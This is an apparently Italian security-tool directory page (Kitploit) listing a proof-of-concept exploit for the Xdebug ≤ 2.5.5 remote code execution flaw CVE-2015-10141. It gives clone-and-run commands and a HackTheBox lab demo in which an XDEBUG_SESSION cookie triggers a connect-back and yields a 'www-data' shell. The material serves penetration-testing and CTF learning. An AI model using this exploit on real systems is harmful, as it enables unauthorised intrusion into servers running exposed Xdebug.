Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PoC-CVE-2015-10141-Xdebug — Script di exploit proof-of-concept per Xdebug 2.5.5 e versioni precedenti (CVE-2015-10141). | Kitploit
Strumenti/GitHubGitHub/n0m4d22/poc-cve-2015-10141-xdebug
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e Formazione
GitHubn0m4d22/poc-cve-2015-10141-xdebug

PoC-CVE-2015-10141-Xdebug

Script di exploit proof-of-concept per Xdebug 2.5.5 e versioni precedenti (CVE-2015-10141).

Vedi Repository
21 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PoC-CVE-2015-10141

Exploit Python personalizzato per Xdebug ≤ 2.5.5 (CVE-2015-10141).


Descrizione

Questo repository contiene il mio exploit di prova di concetto (PoC) per la vulnerabilità di esecuzione remota di codice in Xdebug nelle versioni 2.5.5 e precedenti.
Lo script sfrutta il protocollo di debug non autenticato esposto sulla porta 9000 per ottenere l'esecuzione remota di comandi.

  • Vulnerabilità: CVE-2015-10141
  • Tipo di vulnerabilità: Esecuzione remota di codice (RCE)
  • Software interessato: Xdebug ≤ 2.5.5

Utilizzo

root@kitploit:~
git clone https://github.com/n0m4d22/PoC-CVE-2015-10141.git
cd PoC-CVE-2015-10141
python3 exploit.py

Quando richiesto, inserisci l'IP del target su cui è ospitato Xdebug.

Dimostrazione dal mio recente write-up di HackTheBox Olympus (Medium) :

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ python exploit.py
[*] Target IP: 10.129.124.136
[*] Connecting to 0.0.0.0:9000 ...
[*] Initializing debugging: curl http://10.129.124.136 -H "Cookie: XDEBUG_SESSION=olympus"
[*] Connection to ('10.129.124.136', 36354) established.
$ whoami
www-data

Requisiti

  • Python 3.x
  • Target che esegue Xdebug ≤ 2.5.5 con debug remoto abilitato

Disclaimer

Questo progetto è stato creato esclusivamente a scopo didattico.

Non utilizzare questo exploit contro sistemi senza un'autorizzazione esplicita. Non sono responsabile di qualsiasi uso improprio di questo codice.


Riferimenti

  • NVD – CVE-2015-10141
  • ExploitDB – 44568
  • Sito ufficiale di Xdebug
Scarica lo strumento